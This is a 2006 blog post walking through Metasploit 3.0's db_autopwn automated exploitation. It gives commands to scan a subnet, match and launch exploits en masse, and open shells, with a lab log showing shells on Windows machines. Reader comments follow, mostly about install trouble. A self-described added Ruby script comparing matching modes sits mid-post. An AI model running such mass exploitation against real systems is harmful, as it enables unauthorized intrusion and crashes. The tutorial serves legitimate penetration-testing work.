Sunday, September 17, 2006

Metasploit 3.0 Automated Exploitation

A recurring theme in my presentations about Metasploit 3.0 is the need for exploit automation. As of tonight, we finally have enough code to give a quick demonstration :-)

Metasploit 3 uses the ActiveRecord module (part of Ruby on Rails) to provide an object-oriented interface to an arbitrary database service. Database support is enabled by installing RubyGems, ActiveRecord ("gem install activerecord"), and a database-specific driver ("gem install [ postgresql | sqlite3 | mysql | etc ]"). Once these components have been installed, you will need to load the appropriate plugin from the msfconsole interface for the database that you want to use. The completed plugins include db_postgres, db_sqlite3, and db_sqlite2.

For this example, we will use the PostgreSQL database server on a Gentoo Linux system. While the SQLite database support is functional, performance problems will prevent it from being useful for performing large-scale exploit automation.

You will need a recent version of Ruby (1.8.4+ works nicely), a recent version of PostgreSQL, and a Subversion client for downloading the Metasploit source code. Once these are in place, you need to verify that RubyGems is also installed. If the gem command is not in your path, you will need to install RubyGems. On Gentoo, the command emerge rubygems will build and install this package. Once RubyGems is installed, you need to use the gem command to install ActiveRecord and the PostgreSQL driver for Ruby. This can be accomplished with the commands gem install activerecord and gem install postgres. To verify your installation, run the following command, which should produce no output or errors:
$ ruby -e 'require "rubygems"; require_gem "postgres";'

Once the prerequisites are in place, you need to create a PostgreSQL instance. If you already have a PostgreSQL server running, you can skip this step. To create a new database instance, run the following commands:
$ initdb ~/metasploitdb
$ pg_ctl -D ~/metasploitdb start


Finally, you need to grab the latest copy of the Metasploit Framework source from the public Subversion tree:
$ svn checkout http://metasploit.com/svn/framework3/trunk/ framework3

To obtain the latest updates in the future, just change into the framework3 directory and execute svn update.

Change into the framework3 directory and execute ./msfconsole. You may see a few warning messages about broken modules that you can safely ignore, but eventually you should be looking at an msf > prompt. Load the PostgreSQL driver plugin using the following command:
msf > load db_postgres

Once the plugin loads, type the help command and look at the new options listed under the Postgres Database section. Since we do not have an existing database, we want to use the db_create command. If you created the PostgreSQL instance using the commands above, this should result in various NOTICE and ERROR messages as it loads the schema into the default database name (metasploit3). If you are using an existing PostgreSQL instance, you will need to pass the appropriate parameters to the db_create command (see the help output for more information).

Now that the console is connected to a new database instance, a new set of console commands becomes available. These are listed in the help output under the Database Backend section. To verify that the database connection is valid, execute the db_hosts command. If everything worked, there should be no results and no errors listed. If you receive an error message and a backtrace, use the db_disconnect command and try executing db_create again with different parameters.

With the console connected to the database and the schema in place, you are ready to import vulnerability data. The current version of the framework supports Nessus NBE output files, Nmap XML output files, and a wrapper command (db_nmap) that will launch the nmap port scanner and record the results into the attached database.

Before you start loading data, take a quick look at the db_autopwn command. If you run this command without any parameters, it should result in a blob of text like the following:

msf > db_autopwn
[*] Usage: db_autopwn [options]
-t Show all matching exploit modules
-x Select modules based on vulnerability references
-p Select modules based on open ports
-e Launch exploits against all matched targets
-r Use a reverse connect shell
-b Use a bind shell on a random port
-h Display this help text


The db_autopwn command is where the exploitation magic happens. This command will scan through the database tables and create a list of modules that match up to specific vulnerabilities. This matching process can happen in two different ways. The first method involves analyzing the list of vulnerability references for every exploit and matching them up with the references in every imported vulnerability record. This cross-referencing method is fairly accurate and depends on standard identifiers, such as OSVDB, Bugtraq, and CVE, to match exploits with their targets. The second method uses the default port associated with each exploit module to locate targets running the same service. While this will work in most cases, it can cause a fair amount of collateral damage and is likely to miss vulnerable services running on non-default ports.

At this point, you have a few options. You can either import an existing Nessus NBE file using the db_import_nessus_nbe command, import an existing Nmap XML output file using the db_import_nmap_xml command, or use the db_nmap command to populate the database. The benefit of using a Nessus NBE file is that it provides data for the cross-referencing mode (-x) of db_autopwn. The benefit of using Nmap data is that you can quickly attack a large group of systems without having to run a complete vulnerability scan, but you will miss vulnerabilities that are not on the default port of the associated Metasploit module.
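The two matching modes described above, fed from the kind of Nessus NBE import mentioned in the surrounding paragraphs, as an added example that is not Metasploit's own code: it parses a constructed NBE fragment into service and vulnerability records, runs reference-based (-x) and port-based (-p) matching against a hypothetical module catalog with placeholder references, and reports where the two modes disagree. The module names, plugin ids and references are all assumed.

```ruby
require 'set'

# Constructed NBE fragment (not output from a real scan). Nessus NBE is one
# record per line, fields separated by '|':
#   results|subnet|host|name (port/proto)|plugin id|severity|description
# and newlines inside the description are stored as the two characters \n.
NBE_SAMPLE = <<~'NBE'
  timestamps|||scan_start|Sun Sep 17 22:49:00 2006|
  results|192.168.0|192.168.0.139|microsoft-ds (445/tcp)|90001|Security Hole|Demo bug A.\nCVE : CVE-0000-0001\nBID : 00001
  results|192.168.0|192.168.0.106|unknown (8445/tcp)|90001|Security Hole|Demo bug A, non-default port.\nCVE : CVE-0000-0001
  results|192.168.0|192.168.0.2|microsoft-ds (445/tcp)|90002|Security Note|SMB banner only, no vulnerability reference.
  results|192.168.0|192.168.0.108|http (80/tcp)|90003|Security Hole|Demo bug C.\nOSVDB : 00003
NBE

# Constructed module catalog: hypothetical module names and placeholder
# references (CVE-0000-*, BID-0000*, OSVDB-0000* are not real identifiers).
MODULES = [
  { name: 'exploit/windows/smb/demo_a',  port: 445, refs: %w[CVE-0000-0001 BID-00001] },
  { name: 'exploit/windows/smb/demo_b',  port: 445, refs: %w[CVE-0000-0002] },
  { name: 'exploit/windows/http/demo_c', port: 80,  refs: %w[OSVDB-00003] },
].freeze

Service = Struct.new(:host, :port, :proto, :name)
Vuln    = Struct.new(:host, :port, :refs)

# Pull CVE / BID / OSVDB references out of an NBE description field and
# normalise them to the OSVDB-n / BID-n / CVE-yyyy-nnnn form modules use.
def extract_refs(desc)
  refs = Set.new
  desc.split('\n').each do |part| # split on the literal backslash-n stored in NBE
    case part
    when /\ACVE\s*:\s*(.+)/i   then $1.scan(/CVE-\d{4}-\d{4,}/i).each { |c| refs << c.upcase }
    when /\ABID\s*:\s*(.+)/i   then $1.scan(/\d+/).each { |b| refs << "BID-#{b}" }
    when /\AOSVDB\s*:\s*(.+)/i then $1.scan(/\d+/).each { |o| refs << "OSVDB-#{o}" }
    end
  end
  refs.to_a.sort
end

# Parse NBE 'results' records into open services and vulnerability records.
# Records without a concrete port (e.g. general/tcp) are skipped.
def parse_nbe(text)
  services, vulns = [], []
  text.each_line do |line|
    fields = line.chomp.split('|', 7)
    next unless fields[0] == 'results' && fields.size == 7
    host, portspec, desc = fields[2], fields[3], fields[6]
    m = portspec.match(%r{\A(\S+) \((\d+)/(\w+)\)\z})
    next unless m
    port = m[2].to_i
    services << Service.new(host, port, m[3], m[1])
    refs = extract_refs(desc)
    vulns << Vuln.new(host, port, refs) unless refs.empty?
  end
  [services.uniq, vulns]
end

# -x mode: a module is matched to a host when one of its references equals a
# reference on a vulnerability record for that host. The record's own port is
# used, so a service on a non-default port is still found.
def match_by_refs(modules, vulns)
  matches = []
  modules.each do |mod|
    vulns.each do |v|
      next if (mod[:refs] & v.refs).empty?
      matches << [mod[:name], "#{v.host}:#{v.port}"]
    end
  end
  matches.uniq.sort
end

# -p mode: a module is matched to every open TCP service on its default port,
# whether or not the host is actually vulnerable.
def match_by_ports(modules, services)
  matches = []
  modules.each do |mod|
    services.each do |s|
      next unless s.proto == 'tcp' && s.port == mod[:port]
      matches << [mod[:name], "#{s.host}:#{s.port}"]
    end
  end
  matches.uniq.sort
end

# Where the two modes disagree: port matches with no supporting vulnerability
# record (the collateral-damage case) and reference matches that port mode
# never reaches (the non-default-port case).
def compare_modes(modules, services, vulns)
  by_refs  = match_by_refs(modules, vulns)
  by_ports = match_by_ports(modules, services)
  { collateral: by_ports - by_refs, missed_by_port_mode: by_refs - by_ports }
end

if __FILE__ == $PROGRAM_NAME
  services, vulns = parse_nbe(NBE_SAMPLE)
  puts "#{services.size} services, #{vulns.size} vulnerability records with references"
  compare_modes(MODULES, services, vulns).each do |label, list|
    puts "#{label}:"
    list.each { |mod, target| puts "  #{mod} -> #{target}" }
  end
end
```

On the sample data, port mode hits 192.168.0.2:445 with both SMB modules although no vulnerability was reported there, and never reaches the vulnerable service on 192.168.0.106:8445; reference mode does the opposite.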

Please keep in mind that the db_autopwn command will treat ALL of the records in the database as potential targets. Future versions of the framework will include the ability to limit the targets to a specific subset of the entire database. Until this change occurs, be really careful about what data you feed to the framework. Do NOT import anything into the database that you are not allowed to exploit.

For the first attempt, try using the db_nmap command to identify all Windows 2000 and Windows XP systems on the local network that expose the SMB service.
msf > db_nmap -p 445 [target]

Replace the [target] string with the network block of your local subnet or the IP address of a target system that you want to test. This command will use the Nmap port scanner to find systems with port 445 exposed. Once this command completes, use the db_services command to view the results. If no hosts were found with port 445 open, no results will be displayed by the db_services command.

Assuming that you found at least one system with port 445 open, it's time to run the db_autopwn command and see what modules it will launch. Execute the following command from the console prompt:
msf > db_autopwn -p -t

The -t flag tells the command to display all the match results and the -p flag indicates that port-based matching should be used to locate potential targets. This command should show a handful of exploits and one or two auxiliary modules for every system that was found with port 445 open. Don't worry about the auxiliary modules for now, as they are disabled by default and need to be manually enabled. This is your last chance to verify that every host in the target list is valid and that exploiting (or crashing) these systems won't result in your incarceration or lack of employment.

Time for the fun part! Execute the db_autopwn command again, this time adding the -e flag. This will result in every one of those modules being launched against their specified target. The default payload is a generic bind shell, using a randomized port number for each attempt. Wait for this command to complete and then execute the sessions -l command to view the results. If any of those target systems were vulnerable, you should see at least one command shell. To interact with these shells, use the sessions -i [ID] command. To detach from a shell, use control+Z, and to kill a shell, use control+C.

That's it for the basics. To expand the scope of the test, widen the port range for the db_nmap command or import a Nessus NBE file. If the command finishes but exploits are still running, you can use the jobs command to kill off any stragglers.

The log below is a result of my own testing against a local network full of vulnerable virtual machines.

Enjoy!

-HD



$ ./msfconsole

=[ msf v3.0-beta-2-svn
+ -- --=[ 102 exploits - 93 payloads
+ -- --=[ 17 encoders - 4 nops
=[ 13 aux

msf > load db_postgres
[*] Successfully loaded plugin: db_postgres

msf > db_create
dropdb: database removal failed: ERROR: database "metasploit3" does not exist
CREATE DATABASE
ERROR: table "hosts" does not exist
[ snip ]

msf > db_nmap -p 445 192.168.0.0/24

Starting Nmap 4.01 ( http://www.insecure.org/nmap/ ) at 2006-09-17 22:49 CDT

Interesting ports on destructo (192.168.0.2):
PORT STATE SERVICE
445/tcp open microsoft-ds

Interesting ports on WIN2000DB.lan (192.168.0.106):
PORT STATE SERVICE
445/tcp open microsoft-ds

Interesting ports on WINXPSP0.lan (192.168.0.108):
PORT STATE SERVICE
445/tcp open microsoft-ds

Interesting ports on WIN2000SP4.lan (192.168.0.139):
PORT STATE SERVICE
445/tcp open microsoft-ds


Nmap finished: 256 IP addresses (8 hosts up) scanned in 12.493 seconds
msf > db_services
[*] Service: host=192.168.0.2 port=445 proto=tcp state=up name=microsoft-ds
[*] Service: host=192.168.0.106 port=445 proto=tcp state=up name=microsoft-ds
[*] Service: host=192.168.0.108 port=445 proto=tcp state=up name=microsoft-ds
[*] Service: host=192.168.0.139 port=445 proto=tcp state=up name=microsoft-ds

msf > db_autopwn -p -t -e
[*] Analysis completed in 0.208992004394531 seconds (0 vulns / 0 refs)
[*] Matched auxiliary/dos/windows/smb/rras_vls_null_deref against 192.168.0.106:445...
[*] Matched auxiliary/dos/windows/smb/ms06_035_mailslot against 192.168.0.108:445...
[*] Matched auxiliary/dos/windows/smb/ms06_035_mailslot against 192.168.0.2:445...
[ snip ]
[*] Calling the vulnerable function...
[*] Calling the vulnerable function...
[*] Trying to exploit Windows 2000 LAN Manager
[*] Bound to 6bffd098-a112-3610-9833-46c3f87e345a:1.0@ncacn_np:192.168.0.139[\BROWSER] ...
[*] Building the stub data...
[*] Unexpected DCERPC fault 0x000006f7
[*] Calling the vulnerable function...
[*] Command shell session 4 opened (192.168.0.145:60778 -> 192.168.0.139:26188)
[*] Unexpected DCERPC fault 0x000006f7
[*] Calling the vulnerable function...
[*] Command shell session 5 opened (192.168.0.145:47380 -> 192.168.0.106:27700)

msf > sessions -l

Active sessions
===============

Id Description Tunnel
-- ----------- ------
1 Command shell 192.168.0.145:46858 -> 192.168.0.139:15441
2 Command shell 192.168.0.145:42700 -> 192.168.0.108:28199
3 Command shell 192.168.0.145:40966 -> 192.168.0.106:27915
4 Command shell 192.168.0.145:60778 -> 192.168.0.139:26188
5 Command shell 192.168.0.145:47380 -> 192.168.0.106:27700

msf > sessions -i 1
[*] Starting interaction with 1...

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>


60 Comments:

Blogger Technocrat said...

Pure Auto-Pwnage! HD, you got to update your Nmap man..lol

7:56:00 AM  
Anonymous Anonymous said...

HD, can i have a photo of you to put on my closet? :p

8:56:00 AM  
Anonymous .:LzL:. said...

Great job man !!!! just a question .. using an NBE nessus report, the MSF shell hangs when try to connect port 445 on the remote host / using ms_05_039 .. output //>

[*] Matched exploit/windows/smb/ms05_039_pnp against 192.168.1.2:445...
[*] Launching exploit/windows/smb/ms05_039_pnp (12/12) against 192.168.1.2:445...
[*] Started bind handler
msf > [*] Connecting to the SMB service...

suggestions ?? txs

11:22:00 AM  
Blogger hdm said...

The shell isn't hung actually, that output is just from a background exploit module. Hit enter a couple times and you should see a msf > prompt :-)

1:04:00 PM  
Anonymous .:LzL:. said...

i see .. my mistake, i try ctrl+z .. je :-P
thxs for the info .. !!

2:41:00 PM  
Anonymous infosysec said...

Hi All,

I am no newbie (RH2, AT&T5 & BSD before that), but for the life of me I cannot figure out how to install the plugin for mysql. Got everything else installed and configured fine. The example is Postgres but when I sub MySQL, I get nothing.

When I do:
ruby -e 'require "rubygems"; require_gem "mysql";'

I get:
/usr/local/lib/ruby/site_ruby/1.8/rubygems.rb:251:in `report_activate_error': Could not find RubyGem mysql (>= 0.0.0) (Gem::LoadError)

I really don't want to bother a genius like H.D. (diversion below) so if anyone can answer, I would appreciate it.

Diversion:
At a SANS seminar hosted by Ed Skodis a couple years ago, I asked him about MetaSploit and he told us (after saying how awesome it was) the following story:
H.D. as a DOD contractor was walking down the hall with a General/Colonel (forget), and they walk by a classroom on C++. On the projector was 50 lines of code, and H.D. glanced in while they walked by. A few feet down the hall, he says to the officer, "Just a moment." He walks back, sticks his head in and says, "You've got a buffer overflow in line 32."

Curt Purdy
Manager (wannabe Engineer) Information Security
purdy@tecman.com alias root@infosysec.net

7:20:00 PM  
Blogger hdm said...

The current version of 3.0 has no database plugin for MySQL (nor schema), but writing one up should be easy. To resolve the Gem dependency, just run something like:

$ gem install mysql

I will try to hack up a MySQL plugin later tonight, depending on the workload.

-HD

PS. Lots of fun stories from DoD days :-)

9:43:00 PM  
Anonymous Anonymous said...

im trying to install postgres on linux(slackware) with this command:
"gem install postgres" (after i installed all the ruby components) and i got this error:
" /usr/bin/gem:9: in 'require':no such file to load --rubygems LoadError)
from /usr/bin/gem:9"
someone know what is the problem ?
thanks !

7:51:00 AM  
Blogger hdm said...

It sounds like your gems install is broken. Try reinstalling the rubygems package (assuming slackware has one) or from the source tarball at http://www.rubygems.org/

8:25:00 AM  
Anonymous Vinícius K-Max said...

very nice work, hdm!
keep going!

8:18:00 AM  
Anonymous Anonymous said...

use jobs ??
Let's say i have 3 jobs : 0, 1, 2.

how do i kill job 2 ??

3:45:00 PM  
Blogger hdm said...

The command jobs -l will list all jobs by their ID number. To kill a job, type jobs -k [ID].

3:50:00 PM  
Anonymous slash said...

hi guys,
I have a question. do you guys have this error? I didn't change anything. this is a fresh and default installation of framework3.


msf > db_nmap -sT -P0 localhost

Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2006-10-04 10:06 MYT
Interesting ports on localhost.localdomain (127.0.0.1):
(The 1660 ports scanned but not shown below are in state: closed)
PORT STATE SERVICE
111/tcp open rpcbind
113/tcp open auth
1024/tcp open kdm

Nmap finished: 1 IP address (1 host up) scanned in 0.417 seconds
[-] Error while running command db_nmap: No such file or directory - /tmp/.s.PGSQL.5432


regards.

4:15:00 PM  
Blogger hdm said...

That error occurs because no Postgres database instance has been started.

4:40:00 PM  
Anonymous da said...

I'm sure you don't need any more pats on the back. *pat*. Phenomenal work.

I probably had a conversation with you regarding this already, but I'm still interested in your thoughts on the subject...

How concerned are you about 'lowering the bar' required to successfully hack. The better/more well armed script kiddie is the obvious concern, but I envision a new army of 'security consultants' armed with a new tool to make them appear competent.

I don't have a firm opinion regarding this, but it's a subject I've been pondering. Obviously you are comfortable with releasing the tool (and the many thanks for doing so), but do you have concern regarding the moderately gifted fifth grader that doesn't have a sense of proportion or consequences using such tools?

On a side note, I daydreamed a bit today of new movie hacking sequences , spiffy 3d interfaces, of servers moving from a fuzzed appearance to one visually indicating their vulnerabilities, etc...

Perhaps the upside can (and should?) be that your 'average IT person' may be expected to use such tools to mitigate obvious risk, leaving actual security professionals to do more difficult risk-assessments and work that requires analysis.

/ramble

d a

5:39:00 PM  
Blogger hdm said...

Once network administrators are comfortable with "hacking" their own servers using exploit tools (Metasploit, Impact, Canvas), the security consultants will have to try a little bit harder to justify their rates. My view is that by making exploit technology easy to use and understand, we create a legitimate need for tools that would otherwise be considered harmful. The last thing we need is a law banning exploit development.

8:14:00 PM  
Anonymous Anonymous said...

i'm getting a strange db_hosts output, after db_create went well. it's the same when i use any of the database backend commands. i can't figure out what's broken.

here's the output:

msf > db_hosts
[-] Error while running command db_hosts: can't convert String into Integer

Call stack:
/usr/lib/ruby/gems/1.8/gems/activerecord-1.14.4/lib/active_record/connection_adapters/postgresql_adapter.rb:24:in `connect'
/usr/lib/ruby/gems/1.8/gems/activerecord-1.14.4/lib/active_record/connection_adapters/postgresql_adapter.rb:24:in `postgresql_connection'
/usr/lib/ruby/gems/1.8/gems/activerecord-1.14.4/lib/active_record/connection_adapters/abstract/connection_specification.rb:251:in `connection_without_query_cache='
/usr/lib/ruby/gems/1.8/gems/activerecord-1.14.4/lib/active_record/query_cache.rb:54:in `connection='
/usr/lib/ruby/gems/1.8/gems/activerecord-1.14.4/lib/active_record/connection_adapters/abstract/connection_specification.rb:220:in `retrieve_connection'
/usr/lib/ruby/gems/1.8/gems/activerecord-1.14.4/lib/active_record/connection_adapters/abstract/connection_specification.rb:78:in `connection'
/usr/lib/ruby/gems/1.8/gems/activerecord-1.14.4/lib/active_record/base.rb:1046:in `add_limit!'
/usr/lib/ruby/gems/1.8/gems/activerecord-1.14.4/lib/active_record/base.rb:1017:in `construct_finder_sql'
/usr/lib/ruby/gems/1.8/gems/activerecord-1.14.4/lib/active_record/base.rb:924:in `find_every'
/usr/lib/ruby/gems/1.8/gems/activerecord-1.14.4/lib/active_record/base.rb:381:in `find'
./lib/msf/core/db_objects.rb:35:in `find'
/usr/lib/ruby/1.8/thread.rb:135:in `synchronize'
./lib/msf/core/db_objects.rb:34:in `find'
./lib/msf/core/db.rb:114:in `hosts'
./lib/msf/core/db.rb:105:in `each_host'
./lib/msf/ui/console/command_dispatcher/db.rb:45:in `cmd_db_hosts'
./lib/rex/ui/text/dispatcher_shell.rb:229:in `run_command'
./lib/rex/ui/text/dispatcher_shell.rb:196:in `run_single'
./lib/rex/ui/text/dispatcher_shell.rb:191:in `run_single'
./lib/rex/ui/text/shell.rb:118:in `run'
./msfconsole:63

9:34:00 AM  
Anonymous Anonymous said...

in ./msfconsole

i type:
load db_postgress it will load the plugin but if i type:
db_create i get an error : error while running command db_create: This plugin failed to load: Failed to connect to the database

any idea?

1:25:00 AM  
Anonymous Anonymous said...

i installed the rubygems (and it went smooth: "successfully built Rubygem") and after this i installed the Activerecord (and again, all went smooth..) and then i ran this: "gem install postgres" and i got this error:
"building native extensions. this could take a while...
*** extconf.rb failed ***
...
ERROR:while executing gem... (Runtime error)
error:failed to build gem native extension. "
maybe some1 know what i need to do for this to work ?
thanks !

7:14:00 AM  
Blogger hdm said...

To build the native ruby extensions, you need a recent version of Postgres and the development headers.

4:22:00 PM  
Anonymous Anonymous said...

do i need to install the postgres before i'm running :"gem install postgres" ? (or what), and the development headers of what ? (of postgres ? )
thanks!

4:33:00 PM  
Anonymous Anonymous said...

I get this following error after entering gem install postgres. I am using PostgreSQL 8.1.5-2

Bulk updating Gem source index for: http://gems.rubyforge.org
Building native extensions. This could take a while...
can't find header files for ruby.

ERROR: While executing gem ... (RuntimeError)
ERROR: Failed to build gem native extension.

7:12:00 PM  
Anonymous Anonymous said...

HD, I have installed ruby and MSF 3.0. I also installed PostGreSql 8.1.4. The problem is that I have a FAT32 system and during installation I found out that I would need to manually initialize PostGreSql. I tried to do so but I get an error message saying the server can be initialized with a super user account. I tried creating a new user with createuser; it gives another error message saying "Could not connect to server:Connection refused <0x0000274D/10061>
Is the server running on host "???" and accepting
TCP/IP connection on port 5432?

I use WinXP.

9:29:00 PM  
Blogger hdm said...

If you have trouble building the native postgresql driver, you can try the pure-ruby version instead (gem install postgres-pr).

I have no experience with Postgres on the Windows platform, so no good answers spring to mind. If anyone reading has managed to install and use Postgres on a FAT32 XP system, please leave a comment.

10:30:00 PM  
Blogger sexxploit said...

HD, U said u were gonna hack up a MySql plugin which should serve as a replacement for the PostGreSql.
Why I am asking is because I have not found any solution to my problem on WinXP. I still have MySql installed so I think that would be a better option 4 me.

3:35:00 AM  
Anonymous .:lzl:. said...

hi, i update framework 3.0 via SVN to revision 4.50 and i have an error when i try to start the ide via /msfweb

ArgumentError in Ide#start

Showing app/views/ide/start.rhtml where line #40 raised:

wrong number of arguments (2 for 1)

Extracted source (around line #40):

*cant post the error output-

Your HTML cannot be accepted: PHP, ASP, and other server-side scripting is not allowed.

thks .

:my english sucks SORRY !!

12:36:00 PM  
Blogger hdm said...

MySQL support will be added eventually, but probably not in the next week. The new msfweb interface is going to be in a state of flux for the next couple weeks; if it's completely broken, wait a while, update, and try again :-)

12:40:00 PM  
Anonymous .:lzl:. said...

thks HD, i wait a while ... !! Great job !!

1:37:00 PM  
Anonymous Anonymous said...

hi, I did the install well, launched db_create and finally got an error: couldn't connect to database. The database is there and I can connect well to it with psql.
Is this a script-kiddie protection ?
thanks.

3:02:00 PM  
Blogger Pankaj said...

Hi
I am having a problem while loading postgreSQL
gem install postgres command gives an error that ruby header files are missing. I have used yum install for loading ruby on Fedora 5.
I have not found any place for getting these header files also. Please Help

4:27:00 AM  
Anonymous Anonymous said...

If you're trying to get this working in Debian (sid), these are the packages I installed (I don't know how many are actually needed)

postgresql-dev
libpq-dev
postgres-server-dev-7.4
postgres-7.4
rubygems
libgems-ruby1.8
ruby1.8-dev

When you install rubygems, ruby1.8 is installed along with it, but ruby1.8-dev is not.

I just spent about an hour installing different dev packages trying to figure this out. Finally I turned to Google who, as usual, came through in just a matter of minutes.

11:48:00 AM  
Anonymous Anonymous said...

What's the trick to making pg_ctl create the /tmp/.s.PGSQL.5432 file?


The database starts with seemingly no errors.

-----------------------------
/usr/lib/postgresql/7.4/bin/pg_ctl -D ~/metasploit/metasploitdb start
LOG: database system was shut down at 2006-11-01 11:18:41 CST
LOG: checkpoint record is at 0/B4F6EC
LOG: redo record is at 0/B4F6EC; undo record is at 0/0; shutdown TRUE
LOG: next transaction ID: 615; next OID: 25478
postmaster successfully started
LOG: database system is ready
-----------------------------

This doesn't, however, create the /tmp/.s.PGSQL.5432 file.

I've got a postmaster process running and the /var/run/postgresql/.s.PGSQL.5432= and /var/run/postgresql/.s.PGSQL.5432.lock files are created successfully.

If I manually touch the /tmp/.s.PGSQL.5432 file db_hosts still bombs with a Connection refused error. I've even tried chmod'ing the /tmp file to 777 and I still get the connection refused error.


Any ideas on what I'm doing wrong?

9:44:00 AM  
Anonymous bamed said...

I'm getting the following error: [-] Error while running command db_hosts: FATAL C28000 Mno PostgreSQL user name specified in startup packet Fpostmaster.c L1540 RProcessStartupPacket
Any ideas?

4:34:00 AM  
Anonymous Anonymous said...

hi, i'm having some problems installing postgresql...well i use xp and i began with these commands...
./msfconsole
(correct)
msf >load db_mysql
(I think i read something like if postgresql doesn't work on xp use that so i did, please tell me if it's correct this way)
msf >db_nmap -p 445 192.168.0.0/24
I get an error here; i think it has relation with the path or something like that because it gives me the following error:

Failed to open XML output file /cygdrive/c/DOCUME~1/administrator/CONFIG~1/Temp/dbnmap.3580
.0 for writing
QUITTING!

thanks

2:01:00 PM  
Anonymous Anonymous said...

In response to a previous post, mentioning a problem with the /tmp/.s.PGSQL.5432 file, I've seen the problem as well. From what I can tell, if you try to configure metasploit with postgresql under ubuntu, you will undoubtedly arrive at this error. The problem is not that there is no instance of postgresql running, but that the Ubuntu package stores the file at /var/run/postgresql/.s.PGSQL.5432. I haven't researched it further, but I should assume the solution would be to have postgresql store the file in /tmp. I cannot say whether this is a "bug" in postgresql, metasploit, or the ubuntu package. Probably just an oddity of the ubuntu package conflicting with where metasploit is searching for the file... but I could be way off. If anyone has the solution, me and the other guy are searching for answers. :P

Until then, I'll be running backtrack under vmware-player.

6:29:00 PM  
Anonymous Anonymous said...

I am also getting the following error as bamed said.
Has anyone any idea about that???

msf > db_hosts
[-] Error while running command db_hosts: FATAL C28000 Mno PostgreSQL user name specified in startup packet Fpostmaster.c L1520 RProcessStartupPacket

1:43:00 PM  
Blogger Lersak said...

I have already set up automated exploitation using Metasploit 3-beta with SQLite3 database backend on Cygwin environment.

Check out Automated exploit using Metasploit with SQLite3 and Cygwin.

6:47:00 AM  
Anonymous Anonymous said...

good stuff in here, what i cannot understand is why the msf has a lot of exploits for win 2000 and xp sp1, and for sp2 a few, i am disappointed, if someone knows how to create new exploits please email me at ghost_jedi_mind@yahoo.com. thanks

1:40:00 PM  
Anonymous cloza said...

...msf > db_hosts
[-] Error while running command db_hosts: FATAL C28000 Mno PostgreSQL user name specified in startup packet ...

Try to use "user:pass@host:port/db to" to command db (create, connect ...)
bye

5:10:00 PM  
Anonymous Anonymous said...

First of all I'm REALLY starting to hate linux. I love all the packages that are absolutely required for something to work, but they are not included as dependencies. I tried for about 3 facking hours to get posasql or whatever it's called running and never did, only to see someone say just use the ruby version of it. Great. Then, your highly detailed instructions just cease after the database part and you say read help. Wow, I went thru all this BS only to have you fizzle out on me and make me figure out what the hell is going on on my own. Come on people. Seriously, the linux package system sucks, if a program requires the dev package, why the FACK doesn't it install it automatically? You tell us to set up the database, then you say to create it from the mfs command line... Come on man, put the crack pipe down and follow through with your instructions thanks for your hard work and all, but it seems to be pretty damn pointless and a huge waste of my time to go against your own instructions like that. Thanks for telling me how to do only half of this and leaving me hanging, just FACKING perfect. Every single step was a pain in the FACKING ass and did not work without intense research and looking for random crazy packages that obviously you didn't know needed to be installed. I am so facking angry right now I am about to put my fist thru the monitor. Thanks for the god damn headache

3:36:00 PM  
Blogger hdm said...

If you are looking for a ready-to-pwn version of Metasploit 3 on Linux, try the BackTrack 2.0 Live CD. The package system for Linux varies by distribution and no single installer from us would solve these problems for every Linux user.

3:44:00 PM  
Anonymous Anonymous said...

Really very sorry man, been up all night, got the flu and my back is out. Seriously like the last 15 things I've tried to get running on my system have given me nothing but grief, and my head just decided to blow up. I appreciate all the work you've done on here and will take a fresh look at it when I am feeling better. Again, sorry for being such a clueless asshole.

7:03:00 PM  
Anonymous Anonymous said...

Grrrr, I keep getting a
"Error while running command db_autopwn: no such file to load -- sqlite3"

What am I missing?

3:47:00 AM  
Blogger Daniel said...

Grrr, once I get to the autopwn command I get
"Error while running command db_autopwn: no such file to load -- sqlite3"

What am I missing?

3:48:00 AM  
Anonymous Anonymous said...

Ok...I have got to db_create and the errors appear like you said, but when I run the command db_hosts (or any other command) it returns "can't convert string into integer" with a bunch of garbage following. What could the problem be?

3:53:00 AM  
Anonymous Anonymous said...

I can't seem to get the postgres gem anywhere, when i try to do gem install postgres i get the error Error fetching remote gem cache. Any other way I can get this gem installed? anyone have the actual .gem file?

12:23:00 AM  
Blogger Amir said...

>> db_import_nessus_nbe /scan


[*] Could not read the NBE file
msf >

---------------------------------


Hello 2 all. Im having problems importing a .nbe nessus file, it reports it as unreadable??.

When i try and use the db_nmap this is what i get...


[*] Successfully loaded plugin: db_sqlite3


>> db_create


[*] Creating a new database instance...


>> db_nmap -135 192.168.1.2


help


[-] Unknown command: >>.
[-] Unknown command: [*].
[-] Unknown command: >>.
[-] Unknown command: [*].
[-] Unknown command: >>.

does anyone know how to solve this problem, or tell me where i'm going wrong. :(

11:10:00 AM  
Blogger Amir said...

The postgres plugin loads successfully, however when trying to db_create, it carries on running, please help


>> load db_postgres


[*] Successfully loaded plugin: db_postgres


>> db_create


[-] Error while running command db_create: No such file or directory - psql -q metasploit3

Call stack:
C:/Program Files/Metasploit/Framework3/framework/plugins/db_postgres.rb:119:in `popen'
C:/Program Files/Metasploit/Framework3/framework/plugins/db_postgres.rb:119:in `cmd_db_create'
C:/Program Files/Metasploit/Framework3/framework/lib/rex/ui/text/dispatcher_shell.rb:230:in `send'
C:/Program Files/Metasploit/Framework3/framework/lib/rex/ui/text/dispatcher_shell.rb:230:in `run_command'
C:/Program Files/Metasploit/Framework3/framework/lib/rex/ui/text/dispatcher_shell.rb:196:in `run_single'
C:/Program Files/Metasploit/Framework3/framework/lib/rex/ui/text/dispatcher_shell.rb:191:in `each'
C:/Program Files/Metasploit/Framework3/framework/lib/rex/ui/text/dispatcher_shell.rb:191:in `run_single'
C:/Program Files/Metasploit/Framework3/framework/lib/rex/ui/text/shell.rb:125:in `run'
./script/../config/../config/../../../lib/msf/ui/web/console.rb:63:in `initialize'
./script/../config/../config/../../../lib/msf/ui/web/console.rb:63:in `new'
./script/../config/../config/../../../lib/msf/ui/web/console.rb:63:in `initialize'
./script/../config/../config/../../../lib/msf/ui/web/driver.rb:62:in `new'
./script/../config/../config/../../../lib/msf/ui/web/driver.rb:62:in `create_console'
./script/../config/../app/controllers/console_controller.rb:15:in `index'
C:/Program Files/Metasploit/Framework3/lib/ruby/gems/1.8/gems/actionpack-1.13.2/lib/action_controller/base.rb:1095:in `send'
C:/Program Files/Metasploit/Framework3/lib/ruby/gems/1.8/gems/actionpack-1.13.2/lib/action_controller/base.rb:1095:in `perform_action_without_filters'
